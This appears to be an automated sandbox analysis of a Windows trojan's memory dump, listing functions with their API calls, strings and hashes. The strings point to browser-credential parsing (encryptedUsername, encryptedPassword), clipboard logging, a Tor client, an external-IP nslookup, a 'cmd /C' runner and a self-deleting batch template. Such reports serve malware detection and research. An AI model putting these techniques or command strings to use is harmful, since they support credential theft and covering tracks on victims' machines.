MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 04A1049C
CloseHandle.KERNEL32(?), ref: 04A104A8
PathFindFileNameW.SHLWAPI(?), ref: 04A104B8
lstrlenW.KERNEL32(00000000), ref: 04A104C1
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04A104D2
wcstombs.NTDLL ref: 04A104E1
lstrlen.KERNEL32(?), ref: 04A104EE
UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001), ref: 04A1052A
HeapFree.KERNEL32(00000000,00000000), ref: 04A1053D
DeleteFileW.KERNEL32(?), ref: 04A1054A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 38490bc0c5d81f0c6344c3f5fd95682df59eb9af1b931fbc6f12e97428615601
Instruction ID: 91bafdd9614132d0882274b5b4251fb0875c0b94bf5564313828b08c7121ea28
Opcode Fuzzy Hash: 38490bc0c5d81f0c6344c3f5fd95682df59eb9af1b931fbc6f12e97428615601
Instruction Fuzzy Hash: B0316C35500208FBEF219F65EC48E9F7BB9FF59725F008024F906A2160DB399E96DB60

Uniqueness

Uniqueness Score: -1.00%

Function 049FCC28, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,049FE64A), ref: 049FCC3D

Part of subcall function 049FCC00: InterlockedExchange.KERNEL32(?,000000FF), ref: 049FCC07

WaitForSingleObject.KERNEL32(?,000000FF,?,?,049FE64A), ref: 049FCC5D
CloseHandle.KERNEL32(00000000,?,049FE64A), ref: 049FCC66
CloseHandle.KERNEL32(?,?,?,049FE64A), ref: 049FCC70
RtlEnterCriticalSection.NTDLL(?), ref: 049FCC78
RtlLeaveCriticalSection.NTDLL(?), ref: 049FCC90
Sleep.KERNEL32(000001F4), ref: 049FCC9F
CloseHandle.KERNEL32(?), ref: 049FCCAC
LocalFree.KERNEL32(?), ref: 049FCCB7
RtlDeleteCriticalSection.NTDLL(?), ref: 049FCCC1

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 7923bb11e20b45d204c0010f7ad483be4c943b043091fced916efc979133f144
Instruction ID: f0d9c02ab34a4b0a392bc796aefb4054ff927700027765eaea5be80176a1f48f
Opcode Fuzzy Hash: 7923bb11e20b45d204c0010f7ad483be4c943b043091fced916efc979133f144
Instruction Fuzzy Hash: 90113A7120071AABEB20AF65DD4895ABBFDFF147153058C25EA8693560EB39F8418B20

Uniqueness

Uniqueness Score: -1.00%

Function 04A07CDB, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

FileTimeToLocalFileTime.KERNEL32(00000000,04A0A04D), ref: 04A07D3D
FileTimeToSystemTime.KERNEL32(04A0A04D,?), ref: 04A07D4B
lstrlenW.KERNEL32(00000010), ref: 04A07D5B
lstrlenW.KERNEL32(00000218), ref: 04A07D67
FileTimeToLocalFileTime.KERNEL32(00000008,04A0A04D), ref: 04A07E4D
FileTimeToSystemTime.KERNEL32(04A0A04D,?), ref: 04A07E5B

Strings

%02u-%02u-%02u %02u:%02u:%02uClipboard%s, xrefs: 04A07E86
%02u-%02u-%02u %02u:%02u:%02u%s%s%s, xrefs: 04A07DDE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Time$File$LocalSystemlstrlen$AllocateHeap
String ID: %02u-%02u-%02u %02u:%02u:%02u%s%s%s$%02u-%02u-%02u %02u:%02u:%02uClipboard%s
API String ID: 1122361434-2207419989
Opcode ID: 9f3a985d0c39ce058c6ca36799a1f296996d16072194b94c855c9ba8a68a1ab7
Instruction ID: ae8e849a1c24fa0ab329ca3b9c74e14a6c83600379ab0a8bcd2329a2497e443f
Opcode Fuzzy Hash: 9f3a985d0c39ce058c6ca36799a1f296996d16072194b94c855c9ba8a68a1ab7
Instruction Fuzzy Hash: 8B711F75A0021AABDB10DFA9D884AEEB7F8EF08704F144466F905E7250E738FA45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E7BA, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 169stringCOMMON

Download Yara Rule

APIs

Part of subcall function 049F8F6B: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04A058BE,00000000,00000057,00000057), ref: 049F8F89
Part of subcall function 049F8F6B: GetFileSize.KERNEL32(00000000,00000000,?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F,-00000007,00000000,?), ref: 049F8F99
Part of subcall function 049F8F6B: CloseHandle.KERNEL32(000000FF,?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F,-00000007,00000000,?,?,?), ref: 049F8FFB

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Part of subcall function 049F5772: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,049F2C4F,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 049F577B
Part of subcall function 049F5772: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 049F579E
Part of subcall function 049F5772: memset.NTDLL ref: 049F57AD

strstr.NTDLL ref: 04A0E875

Part of subcall function 04A07648: memset.NTDLL ref: 04A07672
Part of subcall function 04A07648: lstrlen.KERNEL32(04A0E892,00000001,00000000,?,00000000,00000000,00002000,00000000,04A11943,?,?,?,?,?,?,04A0E892), ref: 04A07686
Part of subcall function 04A07648: memcpy.NTDLL(00000000,?,?), ref: 04A076DB

strstr.NTDLL ref: 04A0E8BA
StrChrA.SHLWAPI(?,00000040,?), ref: 04A0E8E3

Strings

encryptedPassword, xrefs: 04A0E892
hostname, xrefs: 04A0E812
://, xrefs: 04A0E909
type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S, xrefs: 04A0E92E
encryptedUsername, xrefs: 04A0E84D

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Filelstrlenmemcpymemsetstrstr$AllocateCloseCreateHandleHeapSize
String ID: ://$encryptedPassword$encryptedUsername$hostname$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
API String ID: 2194731920-2558769663
Opcode ID: 87422c4afd3cc595bd1ab634773874fd65a5ece7fb4bbafadf385d1ecf5f855c
Instruction ID: b34f5623ef7e57987d907a4680113d6ede96638cee6a6fd60bd123ee5226a7f1
Opcode Fuzzy Hash: 87422c4afd3cc595bd1ab634773874fd65a5ece7fb4bbafadf385d1ecf5f855c
Instruction Fuzzy Hash: C451BF72C00215BBDB629F68ED40B9FFBB9AF44754F158855E804B7290EB71BA00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0283D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 04A02868
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 04A02885
HeapFree.KERNEL32(00000000,00000000), ref: 04A028B8
RtlImageNtHeader.NTDLL(00000000), ref: 04A028E1
HeapFree.KERNEL32(00000000,00000000), ref: 04A029A1

Part of subcall function 049F5772: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,049F2C4F,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 049F577B
Part of subcall function 049F5772: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 049F579E
Part of subcall function 049F5772: memset.NTDLL ref: 049F57AD

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 04A02950
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 04A02981

Strings

TorClient, xrefs: 04A0291F, 04A0296C

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID: TorClient
API String ID: 239510280-3399603969
Opcode ID: 6a7886ac76b543af92958b7005db7dffc9cd9882367177edb52998905526a3f7
Instruction ID: ae2e80b950aa71fc76a527287e117adbbf52bb23693628569895c3bde83016db
Opcode Fuzzy Hash: 6a7886ac76b543af92958b7005db7dffc9cd9882367177edb52998905526a3f7
Instruction Fuzzy Hash: 12411536740305FBFB229FA4FC48FAE7AA9EB44744F148064F604AA1E0DB74AE41D750

Uniqueness

Uniqueness Score: -1.00%

Function 049F7DF2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,00000000,049FEFBA,00000000,00000001,@ID@,00000000,?), ref: 049F7E09
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,049F2C64,00000000), ref: 049F7E19
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 049F7E4D
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 049F7E78
memcpy.NTDLL(00000000,?,?), ref: 049F7E97
HeapFree.KERNEL32(00000000,00000000), ref: 049F7EF8
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 049F7F1A

Strings

W, xrefs: 049F7F46

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: 18d63b9d72a707008182dc6d0bf68176cff5745ddf43edec319cc66920087750
Instruction ID: 1a014e525ae029665cb10faa3638047e77d3c9a814a1db04af854e69001842ce
Opcode Fuzzy Hash: 18d63b9d72a707008182dc6d0bf68176cff5745ddf43edec319cc66920087750
Instruction Fuzzy Hash: A2411C7190020AEFDF11DF95CC84AAEBBB9FF14348F1544AAEA1497210E735EE54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A021FB, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 04A0221C

Part of subcall function 049FDD94: lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,04A0223C,00000000), ref: 049FDDB9
Part of subcall function 049FDD94: RtlAllocateHeap.NTDLL(00000000,?), ref: 049FDDCB
Part of subcall function 049FDD94: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04A0223C,00000000), ref: 049FDDE8
Part of subcall function 049FDD94: lstrlenW.KERNEL32(00000000,?,?,04A0223C,00000000), ref: 049FDDF4
Part of subcall function 049FDD94: HeapFree.KERNEL32(00000000,00000000,?,?,04A0223C,00000000), ref: 049FDE08

RtlEnterCriticalSection.NTDLL(00000000), ref: 04A02254
CloseHandle.KERNEL32(?,?,049F11C6), ref: 04A02262
HeapFree.KERNEL32(00000000,00000000,00000000,00000001,.dll,00000000,00001000,00000000,00000000,049F11C6,?,049F11C6), ref: 04A02321
RtlLeaveCriticalSection.NTDLL(00000000), ref: 04A02330
HeapFree.KERNEL32(00000000,00000000,.dll,00000000,00001000,00000000,00000000,049F11C6,?,049F11C6), ref: 04A02343

Strings

.exe, xrefs: 04A0227B, 04A0228D, 04A022C4
.dll, xrefs: 04A02274

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID: .dll$.exe
API String ID: 1719504581-724907077
Opcode ID: 1779614d40deab183624530927e00d4bb8aee56285bef7ec561b6d7a053983ad
Instruction ID: 5e7e5710efc79a4a3dd0d4dd43f2c6e4c2396cfeaf2e7e005346c33d8849c39b
Opcode Fuzzy Hash: 1779614d40deab183624530927e00d4bb8aee56285bef7ec561b6d7a053983ad
Instruction Fuzzy Hash: 84418536600305BBEF219F94D888BEE7BB9FF54714F1040A5E900AB1A0DB34EE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04A0F6B6, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(04A16FEC), ref: 04A0F6C8
lstrcpy.KERNEL32(00000000), ref: 04A0F6FD

Part of subcall function 04A0BA39: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,04A058AA,?,?,-00000007,04A0A28F,-00000007,00000000,?,?,?,?), ref: 04A0BA48
Part of subcall function 04A0BA39: mbstowcs.NTDLL ref: 04A0BA64

GetLastError.KERNEL32(00000000), ref: 04A0F78E
HeapFree.KERNEL32(00000000,?), ref: 04A0F7A5
InterlockedDecrement.KERNEL32(04A16FEC), ref: 04A0F7BC
DeleteFileA.KERNEL32(00000000), ref: 04A0F7DD
HeapFree.KERNEL32(00000000,00000000), ref: 04A0F7ED

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

Strings

.avi, xrefs: 04A0F6F0

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID: .avi
API String ID: 908044853-1706533258
Opcode ID: d8252b0fe21a398ee4978b2cd4a82284d065f0a85913912654925f27a3a8740a
Instruction ID: 746f3caefe485ff5037c95d9cb144d3b5a89b018df239ab1c2224d29f5b440ee
Opcode Fuzzy Hash: d8252b0fe21a398ee4978b2cd4a82284d065f0a85913912654925f27a3a8740a
Instruction Fuzzy Hash: B731C876A00214FFEF319FA4EC44AAD7AB5EB98B50F118011F905F61D0D7B4AE42D791

Uniqueness

Uniqueness Score: -1.00%

Function 04A0A443, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

lstrlen.KERNEL32(00000000,74B5F730,00000F00,00000000), ref: 04A0A467

Part of subcall function 049F1C67: lstrlen.KERNEL32(?), ref: 049F1C78
Part of subcall function 049F1C67: lstrlen.KERNEL32(?), ref: 049F1C7F
Part of subcall function 049F1C67: RtlAllocateHeap.NTDLL(00000000,?), ref: 049F1C91
Part of subcall function 049F1C67: _snprintf.NTDLL ref: 049F1CB4
Part of subcall function 049F1C67: _snprintf.NTDLL ref: 049F1CDF
Part of subcall function 049F1C67: HeapFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 049F1D02

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,?,00000000,74B5F730,00000000), ref: 04A0A4F3
HeapFree.KERNEL32(00000000,74B5F730,?,00000000,74B5F730,00000000), ref: 04A0A510
DeleteFileA.KERNEL32(00000000,00000000,74B5F730,00000000), ref: 04A0A518
HeapFree.KERNEL32(00000000,00000000), ref: 04A0A527

Strings

s:, xrefs: 04A0A4E9
nslookup myip.opendns.com resolver1.opendns.com , xrefs: 04A0A474
ss: *.*.*.*, xrefs: 04A0A4A9, 04A0A4AE, 04A0A4D1

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
API String ID: 2960378068-949792001
Opcode ID: 0c6c103dd8e8f90049e57dfe21964cd6c4a0899010e3b4137574296348feae6b
Instruction ID: 5ec75a3e46748c88dde5da8d8eabc471898c4473a83767a1053276dcc82fd924
Opcode Fuzzy Hash: 0c6c103dd8e8f90049e57dfe21964cd6c4a0899010e3b4137574296348feae6b
Instruction Fuzzy Hash: DA212D72A00255BBEB109FE9DD84FAEBBFCEB59314F040465E615E2191E674BA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A09D0F, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,74B481D0,00000000,00000000), ref: 04A09D33

Part of subcall function 049F76B3: lstrcpy.KERNEL32(-000000FC,00000000), ref: 049F76ED
Part of subcall function 049F76B3: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 049F76FF
Part of subcall function 049F76B3: GetTickCount.KERNEL32 ref: 049F770A
Part of subcall function 049F76B3: GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 049F7716
Part of subcall function 049F76B3: lstrcpy.KERNEL32(00000000), ref: 049F7730

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

lstrcpy.KERNEL32(00000000), ref: 04A09D63
wsprintfA.USER32 ref: 04A09D76
GetTickCount.KERNEL32 ref: 04A09D8B
wsprintfA.USER32 ref: 04A09D99

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

Strings

attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0, xrefs: 04A09D93
.bat, xrefs: 04A09D56
"%S", xrefs: 04A09D70

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
API String ID: 1152860224-2880143881
Opcode ID: 93b0e98362fd241718cf898d207a4d2f87e98acc61a0b922732d60e7b4820d53
Instruction ID: 62669bc5d8fc06148ff3156eb1de2f905727f218fc720764b06e494456e35fbd
Opcode Fuzzy Hash: 93b0e98362fd241718cf898d207a4d2f87e98acc61a0b922732d60e7b4820d53
Instruction Fuzzy Hash: 1A1191B29023117BF6217BA8AC08E5F7B9CDF98758F458458FE05A6251DE78BC024BB1

Uniqueness

Uniqueness Score: -1.00%

Function 049F1C67, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 049F1C78
lstrlen.KERNEL32(?), ref: 049F1C7F
RtlAllocateHeap.NTDLL(00000000,?), ref: 049F1C91
_snprintf.NTDLL ref: 049F1CB4

Part of subcall function 049FC881: memset.NTDLL ref: 049FC896
Part of subcall function 049FC881: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 049FC8D1
Part of subcall function 049FC881: wcstombs.NTDLL ref: 049FC8DB
Part of subcall function 049FC881: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 049FC90F
Part of subcall function 049FC881: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,049F1CC4), ref: 049FC93B
Part of subcall function 049FC881: TerminateProcess.KERNEL32(?,000003E5), ref: 049FC951
Part of subcall function 049FC881: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,049F1CC4), ref: 049FC965
Part of subcall function 049FC881: CloseHandle.KERNEL32(?), ref: 049FC998
Part of subcall function 049FC881: CloseHandle.KERNEL32(?), ref: 049FC99D

_snprintf.NTDLL ref: 049F1CDF

Part of subcall function 049FC881: GetLastError.KERNEL32 ref: 049FC969
Part of subcall function 049FC881: GetExitCodeProcess.KERNEL32(?,00000001), ref: 049FC989

HeapFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 049F1D02

Strings

echo -------- >, xrefs: 049F1CD3
cmd /C "%s> %s1", xrefs: 049F1CA3, 049F1CAB, 049F1CD8

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID: cmd /C "%s> %s1"$echo -------- >
API String ID: 1481739438-1722754249
Opcode ID: db5812a4cde77dea1564e464131d2e8234214cc4b4ca2e7e5c2d64eea7bc067d
Instruction ID: 4361baac88942c6ee3cd43d2bbe5311f7f3da68886e78a8a7937cd205ac4679a
Opcode Fuzzy Hash: db5812a4cde77dea1564e464131d2e8234214cc4b4ca2e7e5c2d64eea7bc067d
Instruction Fuzzy Hash: DF117976900228BBEF126F54CC05E9E7F69FB48764F118125FE04A62A0C635AE11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0BBF8, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04A08975,-00000008,-00000008,?,?,?,?,04A08975,-00000008,?,?,-00000008,?,04A05B29,Transfer-Encoding:, chunked), ref: 04A0BC0F
lstrlen.KERNEL32(-00000008,?,?,?,04A08975,-00000008,?,?,-00000008,?,04A05B29,Transfer-Encoding:, chunked), ref: 04A0BC17
lstrlen.KERNEL32(?,?,?,?,04A08975), ref: 04A0BC82
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A0BCAD
memcpy.NTDLL(00000000,00000002,-00000106,?,?,?,04A08975), ref: 04A0BCBE
memcpy.NTDLL(00000000,04A08975,04A08975,?,?,?,?,?,?,04A08975), ref: 04A0BCD4
memcpy.NTDLL(00000000,?,?,00000000,04A08975,04A08975,?,?,?,?,?,?,04A08975), ref: 04A0BCE6
memcpy.NTDLL(00000000,04A133F4,00000002,00000000,?,?,00000000,04A08975,04A08975,?,?,?,?,?,?,04A08975), ref: 04A0BCF9
memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?,?,04A08975), ref: 04A0BD0E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 19c877a11f3212c129463feafdab69562e69c5debb8f995da216854ce3751965
Instruction ID: 47b00ddeea11d1cbd936297bf061e841f0ae976b28f224a043083c5822a6cbcc
Opcode Fuzzy Hash: 19c877a11f3212c129463feafdab69562e69c5debb8f995da216854ce3751965
Instruction Fuzzy Hash: 30413B72D00209FBDF01DFE8DD85AAEBBB8EF48354F148466E914A7250E731EA50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 049F98A8, Relevance: 13.6, APIs: 9, Instructions: 108memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0881F: RtlEnterCriticalSection.NTDLL(04A173A8), ref: 04A08827
Part of subcall function 04A0881F: RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 04A0883C
Part of subcall function 04A0881F: InterlockedIncrement.KERNEL32(0000001C), ref: 04A08855

RtlAllocateHeap.NTDLL(00000000,?,-00000008), ref: 049F98F6
lstrlen.KERNEL32(00000008,?,?,?,049F1DAD,00000000,00000000,-00000008,?,?), ref: 049F9906
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 049F9918
HeapFree.KERNEL32(00000000,?,?,?,?,049F1DAD,00000000,00000000,-00000008,?,?), ref: 049F992A
memcpy.NTDLL(?,?,?,?,?,?,049F1DAD,00000000,00000000,-00000008,?,?), ref: 049F993E
lstrcpy.KERNEL32(00000020), ref: 049F9970
RtlEnterCriticalSection.NTDLL(04A173A8), ref: 049F997B
RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 049F99D4

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 8b5ca47b5116716d25ea3d31b6a1403a67fc851d2f182621a7d27992448c9b1a
Instruction ID: 62b5bf1c2e6ed08b5cbc998f0db638b3d286fc2ba22833e5703454165f36e725
Opcode Fuzzy Hash: 8b5ca47b5116716d25ea3d31b6a1403a67fc851d2f182621a7d27992448c9b1a
Instruction Fuzzy Hash: AC4197B5500300EFEB219F94D881BAA7BF8FF14310F158469EA4587660DB79E995CF90

Uniqueness

Uniqueness Score: -1.00%

Function 049F2815, Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,04A0EA24), ref: 049F2855
GetLastError.KERNEL32 ref: 049F285F
WaitForSingleObject.KERNEL32(000000C8), ref: 049F2884
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 049F28A7
SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 049F28CF
WriteFile.KERNEL32(00000006,00001388,?,?,00000000), ref: 049F28E4
SetEndOfFile.KERNEL32(00000006), ref: 049F28F1
GetLastError.KERNEL32 ref: 049F28FD
CloseHandle.KERNEL32(00000006), ref: 049F2909

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 5aa23451721d7b4cc9ceb0b9f14fbb515bc5d786e4d0cc95ce96bb8cbbd43723
Instruction ID: 810f24b8570e4cef4c44a2be252c13491505e36b05f8d01607cf73527a8318b4
Opcode Fuzzy Hash: 5aa23451721d7b4cc9ceb0b9f14fbb515bc5d786e4d0cc95ce96bb8cbbd43723
Instruction Fuzzy Hash: B2317C31900208BFFF109FA4DD09BAEBBB9EB14325F1081A5FA11A60E0D7759E45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 049F1F07, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000094,00000000,04A094FA,?,049F119D,00000010,00000001,00000000,00000000,049F119D,?), ref: 049F1F26
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 049F1F5A
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 049F1F62
GetLastError.KERNEL32 ref: 049F1F6C
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 049F1F88
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 049F1FA1
CancelIo.KERNEL32(?), ref: 049F1FB6
CloseHandle.KERNEL32(?), ref: 049F1FC6
GetLastError.KERNEL32 ref: 049F1FCE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: f8210e91cf1693cb42274af56de3bb0e89344b7e076b41b8a9e06f7970dcd260
Instruction ID: 959d1a3106d679f650b25c4683255dab252598a90fe5ffb0894ce8ba48753911
Opcode Fuzzy Hash: f8210e91cf1693cb42274af56de3bb0e89344b7e076b41b8a9e06f7970dcd260
